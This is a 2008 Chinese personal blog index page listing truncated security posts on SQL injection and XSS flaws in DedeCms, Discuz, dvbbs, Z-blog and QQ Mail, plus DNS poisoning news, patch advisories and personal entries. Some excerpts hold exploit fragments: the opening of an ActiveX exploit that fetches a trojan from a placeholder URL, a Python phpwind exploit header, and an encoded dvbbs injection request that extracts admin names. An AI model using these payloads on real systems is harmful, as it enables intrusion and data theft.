寂寞空屋
百度首页 | 百度空间
 
文章列表
  
dedecms注射漏洞
2008-08-20 16:27
漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,
阅读全文>>
类别:3xp | 评论(0) | 浏览()
 
Discuz Wap Injection Exploit
2008-08-04 23:11
Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑

由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误

提交一个 '
转意成 \'
然后转成gbk的,\和'就变成两个字符了
'就可以成功的引入
<* 参考
阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
最新DNS EXP公布
2008-07-25 15:03
Infoworld 报道,著名黑客HD Moore已经率先公布了可用代码.利用这段代码可以对DNS服务器进行投毒,将一条恶意纪录植入目标服务器,该服务器将随机发起域名查询,此时攻击者可以提供伪造的响应,将域名服务器中的纪录指向其特定站点.这个漏洞攻击可以默默的改变用户的升级服务下载恶意软件,IOActive研究者Dan Kaminsky很早发现漏洞并且无意中这周公布了漏洞使得开发出攻击代码.infoworld.com网站也提醒了这个攻击导致的网络钓鱼欺骗的问题. 通过这个网址http://metasploit.com/dev/trac/changeset/5579可以看到国外黑客发布的DNS漏洞攻击代码
阅读全文>>
类别:3xp | 评论(0) | 浏览()
 
Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
2008-07-25 00:07
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovered by Oliver Lavery http://www.securityfocus.com/bid/8536/info Remote: Yes greetz to str0ke */ #include #include #define Filename "Ms-Access-SnapShot.html" FILE *File; char data[] = " \n\n" "\nvar arbitrary_file = 'http://path_to_trojan'\n"
阅读全文>>
类别:3xp | 评论(0) | 浏览()
 
MS Office Snapshot Viewer ActiveX漏洞应急补丁
2008-07-23 10:41
攻击者可以构造特殊的页面调用Office Snapshot Viewer ActiveX造成溢出,用户一旦访问,攻击者就会获得系统权限或者下载指定文件。现网马已经大规模使用,危害巨大,由于官方未出补丁。 参照CSI提供的应急补丁: http://www.vaid.cn/blog/attachment/ms+office+snapshot+viewer+activex+exploit+fix+tool.rar 影响平台: Microsoft Access 2000 Microsoft Access 2002 Microsoft Access 2003 Microsoft Access Snapshot Viewer Microsoft Office 2000 Microsoft Office 2003 Professional Edition Microsoft Office 2003 Small Busines
阅读全文>>
类别:安全技术 | 评论(0) | 浏览()
 
[安全预警]MS08-037 Windows 域名系统欺骗漏洞即将大规模爆发!
2008-07-23 10:34
国外已经有牛人在自己BLOG上公布了利用漏洞的细节,虽然文章已经删除,但已经有很多人掌握了。为防止被不法份子利用,造成大规模危害,请各管理员即时安装补丁 介绍: 此安全更新可解决 Windows 域名系统 (DNS) 中两个秘密报告的漏洞,这些漏洞可允许欺骗。 DNS 客户端和 DNS 服务器中均存在这些漏洞,这些漏洞可能会允许远程攻击者将 Internet 上针对系统的网络通信重定向至攻击者自己的系统。 修复漏洞: Apply the patch released by vendors, MS08-037 - http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx IS
阅读全文>>
类别:安全技术 | 评论(0) | 浏览()
 
Z-blog跨站脚本攻击漏洞
2008-07-10 11:25
漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。 漏洞厂商:http://www.rainbowsoft.org/ 漏洞解析:在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理 strUrl=URLDecodeForAntiSpam(Request.QueryString("url")) 其中URL
阅读全文>>
类别:Xss | 评论(2) | 浏览()
 
Oblog最新注入漏洞分析(已修补)
2008-07-08 11:02
Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >='"
阅读全文>>
类别:3xp | 评论(0) | 浏览()
 
QQ Mail跨站脚本漏洞
2008-07-08 11:02
漏洞说明:QQ Mail是Tencent公司提供的webmail服务,你可以使用你的QQ帐户来登陆使用Mail服务,具体的信息可以访问http://mail.qq.com/。但是80sec团队成员在QQ Mail里发现存在跨站脚本漏洞,恶意用户可以通过该漏洞在邮件里伪造登陆表单窃取目标用户的密码以及偷取Cookie以取得其他用户的身份,或者使用ajax等技术读取用户的敏感信息。 漏洞成因:QQ Mail的Javascript Dom部分在处理邮件内容,对邮件内容字符串的处理分为str和code两个流程,通过组合的标签内容可以误导Javascript处理图片内容和文字链接进入str流程,将HTML编码字符
阅读全文>>
类别:Xss | 评论(0) | 浏览()
 
phpwind管理权限泄露漏洞利用程序
2008-06-19 12:34

Python代码 各位大大自己分析写其他版吧
常来http://www.80sec.com

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)

def banner():
print ""
print "########################################################"
print "Phpw

阅读全文>>
类别:3xp | 评论(0) | 浏览()
 
dvbbs 8.2 SQL注射漏洞分析
2008-06-19 12:29

漏洞公告: http://seclists.org/bugtraq/2008/May/0330.html
利用方式: 一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%252

阅读全文>>
类别:网站漏洞 | 评论(0) | 浏览()
 
FLASH 0DAY 详细分析和总结!
2008-06-18 21:24

By:racle

手记:
------------------------------------------
首先必须感谢的X.G.C.Team的OPEN在几个关键的地方给予我分析,解决办法的帮助.与及咱们论坛好几位兄弟的帮助.最终我才把这个东西给分析出来..
------------------------------------------
最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://

阅读全文>>
类别:3xp | 评论(0) | 浏览()
 
复活了
2008-06-17 20:54

Form Now On,本人复活了

沉睡了快一年了,技术也落伍了,努力开始学技术咯

类别:心灵轨迹 | 评论(0) | 浏览()
 
一部有良知的中国人必看的电影----《南京》
2007-12-23 00:02
今天看了一场电影《南京》,是一部通过当事人和一些真实的影像资料而拍成的记录片,十分的震撼!其中有几个镜头让我记忆犹新:一个中国妇女挨日本禽兽羞辱后被斩首没死,来外国就驻的医院看病,那脖子上清晰可见的脊椎;一个额头上挨了一记刺刀儿童的情形;一位老人所述的他母亲挨刺刀刺死,怀抱着的婴儿被日本人刺刀挑起后扔飞,依然趟着满的血爬回母亲的尸体吃奶的情形。我落泪了!“忘记等于背叛”,然而现在我们有几个知道南京大屠杀的发生的日期?了解我们同胞的苦难?《南京》是一部值得每个中国人看的电影,然而它上映不到几天就被
阅读全文>>
类别:默认分类 | 评论(3) | 浏览()
 
沉默
2007-10-01 21:56
哎,不想再多说什么了
类别:心灵轨迹 | 评论(4) | 浏览()
 
更多文章>>
     
 
 
文章分类
  
默认分类(38)
 
心灵轨迹(13)
 
黑客技术(48)
 
3xp(24)
 
网站漏洞(15)
 
Xss(27)
 
Programs(2)
 
安全技术(7)
 
原创(8)
 
     
 
其它
  
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
背景音乐
  
 
最近访客
  
 

0x23
indown的某男

jcckerbokee
chable

hunanshibei
dianso

lovekeben
值得疯狂
     
 
最新照片
  
   


©2008 Baidu